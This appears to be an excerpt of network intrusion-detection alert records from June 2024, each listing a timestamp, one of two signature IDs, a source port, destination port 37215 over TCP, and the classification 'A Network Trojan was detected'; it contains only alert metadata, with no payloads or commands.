              Timestamp:06/13/24-21:31:59.177695
              SID:2829579
              Source Port:53646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990049
              SID:2835222
              Source Port:46188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.131094
              SID:2829579
              Source Port:40064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321122
              SID:2829579
              Source Port:42710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345979
              SID:2829579
              Source Port:34682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.933127
              SID:2829579
              Source Port:40724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358846
              SID:2829579
              Source Port:43270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550670
              SID:2835222
              Source Port:38468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658031
              SID:2835222
              Source Port:56272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.368896
              SID:2835222
              Source Port:42562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457148
              SID:2835222
              Source Port:33470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724608
              SID:2829579
              Source Port:53506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785879
              SID:2829579
              Source Port:33208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099978
              SID:2829579
              Source Port:37414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309570
              SID:2835222
              Source Port:47636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423111
              SID:2835222
              Source Port:52888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.453420
              SID:2829579
              Source Port:44338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567950
              SID:2829579
              Source Port:55264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711008
              SID:2829579
              Source Port:41988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404119
              SID:2835222
              Source Port:54144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754281
              SID:2835222
              Source Port:48340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175407
              SID:2835222
              Source Port:43940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457030
              SID:2829579
              Source Port:43856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695846
              SID:2829579
              Source Port:56584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094686
              SID:2835222
              Source Port:35826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304565
              SID:2835222
              Source Port:34340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181075
              SID:2835222
              Source Port:32974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212865
              SID:2835222
              Source Port:39778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.570394
              SID:2835222
              Source Port:38856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302329
              SID:2829579
              Source Port:48840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156651
              SID:2835222
              Source Port:47758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889822
              SID:2829579
              Source Port:58532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993825
              SID:2835222
              Source Port:50316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785654
              SID:2829579
              Source Port:36004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954199
              SID:2829579
              Source Port:58958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.212528
              SID:2829579
              Source Port:37946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248705
              SID:2829579
              Source Port:51562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474165
              SID:2835222
              Source Port:36032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474678
              SID:2829579
              Source Port:50250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154509
              SID:2835222
              Source Port:55734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.609821
              SID:2835222
              Source Port:37560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785150
              SID:2829579
              Source Port:37188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802716
              SID:2835222
              Source Port:48658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078044
              SID:2829579
              Source Port:32832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614671
              SID:2835222
              Source Port:40936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.073881
              SID:2835222
              Source Port:40624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228553
              SID:2835222
              Source Port:36180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632030
              SID:2829579
              Source Port:44790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024390
              SID:2835222
              Source Port:59048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245950
              SID:2835222
              Source Port:55900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136428
              SID:2829579
              Source Port:52918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995803
              SID:2835222
              Source Port:59984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316434
              SID:2829579
              Source Port:34294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525565
              SID:2835222
              Source Port:47686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125627
              SID:2835222
              Source Port:37254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.934532
              SID:2835222
              Source Port:37240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551461
              SID:2835222
              Source Port:56484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248584
              SID:2835222
              Source Port:40774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.371255
              SID:2829579
              Source Port:48734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671189
              SID:2829579
              Source Port:47378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169015
              SID:2829579
              Source Port:52934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546507
              SID:2835222
              Source Port:43140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993163
              SID:2835222
              Source Port:52258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347035
              SID:2835222
              Source Port:42430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.054971
              SID:2835222
              Source Port:43312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221844
              SID:2835222
              Source Port:58828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758666
              SID:2829579
              Source Port:47174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212040
              SID:2829579
              Source Port:59902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079388
              SID:2835222
              Source Port:51480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.634618
              SID:2829579
              Source Port:50678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755768
              SID:2829579
              Source Port:36858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211634
              SID:2835222
              Source Port:41258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996237
              SID:2829579
              Source Port:35608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106689
              SID:2835222
              Source Port:50926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.458476
              SID:2835222
              Source Port:43352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480310
              SID:2835222
              Source Port:40098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268543
              SID:2829579
              Source Port:51460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092274
              SID:2829579
              Source Port:47336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629651
              SID:2835222
              Source Port:35344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728783
              SID:2829579
              Source Port:41626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321399
              SID:2829579
              Source Port:60366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110658
              SID:2835222
              Source Port:57544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344685
              SID:2829579
              Source Port:49280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024653
              SID:2835222
              Source Port:55836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096779
              SID:2835222
              Source Port:49744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871374
              SID:2829579
              Source Port:36590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456008
              SID:2829579
              Source Port:43988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108990
              SID:2829579
              Source Port:33172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838283
              SID:2835222
              Source Port:57556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302897
              SID:2835222
              Source Port:48320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111988
              SID:2835222
              Source Port:56422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176220
              SID:2829579
              Source Port:52136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165451
              SID:2829579
              Source Port:39586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988819
              SID:2829579
              Source Port:54330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294890
              SID:2829579
              Source Port:46052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409281
              SID:2835222
              Source Port:37942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265591
              SID:2829579
              Source Port:32878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452466
              SID:2835222
              Source Port:57690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697010
              SID:2829579
              Source Port:48060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263760
              SID:2829579
              Source Port:56314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026232
              SID:2835222
              Source Port:54204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056455
              SID:2835222
              Source Port:43784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842590
              SID:2829579
              Source Port:41058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485301
              SID:2835222
              Source Port:56000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546217
              SID:2835222
              Source Port:55824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.510312
              SID:2829579
              Source Port:49758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128811
              SID:2829579
              Source Port:44946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307931
              SID:2835222
              Source Port:60304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503936
              SID:2835222
              Source Port:49346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782491
              SID:2835222
              Source Port:33148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823565
              SID:2835222
              Source Port:50884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936541
              SID:2829579
              Source Port:34334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790561
              SID:2829579
              Source Port:44408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197572
              SID:2829579
              Source Port:56970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357520
              SID:2829579
              Source Port:46542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612201
              SID:2829579
              Source Port:39516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672910
              SID:2829579
              Source Port:53714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359424
              SID:2829579
              Source Port:56208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.175516
              SID:2829579
              Source Port:37798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415752
              SID:2829579
              Source Port:47842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547060
              SID:2829579
              Source Port:47426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757116
              SID:2829579
              Source Port:36168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153847
              SID:2829579
              Source Port:53360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730855
              SID:2829579
              Source Port:36018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697353
              SID:2829579
              Source Port:47394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256332
              SID:2835222
              Source Port:55934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436290
              SID:2835222
              Source Port:53788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.693864
              SID:2835222
              Source Port:34772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223392
              SID:2835222
              Source Port:53520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263991
              SID:2829579
              Source Port:33644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724647
              SID:2835222
              Source Port:57472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507197
              SID:2829579
              Source Port:36188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045655
              SID:2829579
              Source Port:58894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478129
              SID:2835222
              Source Port:36942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613100
              SID:2829579
              Source Port:53642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223730
              SID:2835222
              Source Port:39550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181656
              SID:2835222
              Source Port:60050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.242087
              SID:2829579
              Source Port:50916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887434
              SID:2829579
              Source Port:38128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976833
              SID:2835222
              Source Port:53344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175842
              SID:2835222
              Source Port:46084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991618
              SID:2835222
              Source Port:46350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669677
              SID:2829579
              Source Port:56602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711415
              SID:2829579
              Source Port:35654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266640
              SID:2835222
              Source Port:60904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914294
              SID:2829579
              Source Port:58088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307393
              SID:2835222
              Source Port:39108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248178
              SID:2829579
              Source Port:32804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264042
              SID:2829579
              Source Port:36492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269864
              SID:2829579
              Source Port:46312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614622
              SID:2835222
              Source Port:53158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.417843
              SID:2829579
              Source Port:50522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610797
              SID:2835222
              Source Port:45892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419654
              SID:2829579
              Source Port:40142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678131
              SID:2829579
              Source Port:38398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754621
              SID:2829579
              Source Port:51088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913826
              SID:2835222
              Source Port:35570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527938
              SID:2835222
              Source Port:35140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987326
              SID:2829579
              Source Port:53908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256821
              SID:2835222
              Source Port:51838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228070
              SID:2829579
              Source Port:47768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727665
              SID:2829579
              Source Port:57882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216765
              SID:2829579
              Source Port:58294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.628775
              SID:2835222
              Source Port:38360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273059
              SID:2835222
              Source Port:37910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165694
              SID:2829579
              Source Port:34648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839924
              SID:2829579
              Source Port:47920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091232
              SID:2835222
              Source Port:54734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942733
              SID:2829579
              Source Port:41538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257824
              SID:2829579
              Source Port:35902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611448
              SID:2829579
              Source Port:52430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165064
              SID:2835222
              Source Port:52366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911439
              SID:2835222
              Source Port:60414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419369
              SID:2829579
              Source Port:52764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867910
              SID:2835222
              Source Port:43066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174951
              SID:2835222
              Source Port:58874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174348
              SID:2835222
              Source Port:34570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751750
              SID:2835222
              Source Port:55070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137824
              SID:2835222
              Source Port:43452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971902
              SID:2829579
              Source Port:54428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824419
              SID:2835222
              Source Port:56090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042688
              SID:2829579
              Source Port:35558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843739
              SID:2829579
              Source Port:56808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991273
              SID:2835222
              Source Port:60774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710572
              SID:2829579
              Source Port:57684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.010761
              SID:2835222
              Source Port:51186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278626
              SID:2835222
              Source Port:60282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214604
              SID:2829579
              Source Port:43820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607911
              SID:2829579
              Source Port:40590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611166
              SID:2835222
              Source Port:38424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869765
              SID:2835222
              Source Port:36864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474251
              SID:2829579
              Source Port:50070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404143
              SID:2835222
              Source Port:50546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025384
              SID:2829579
              Source Port:43864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154116
              SID:2835222
              Source Port:46704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089241
              SID:2829579
              Source Port:43134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976621
              SID:2829579
              Source Port:41880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.706989
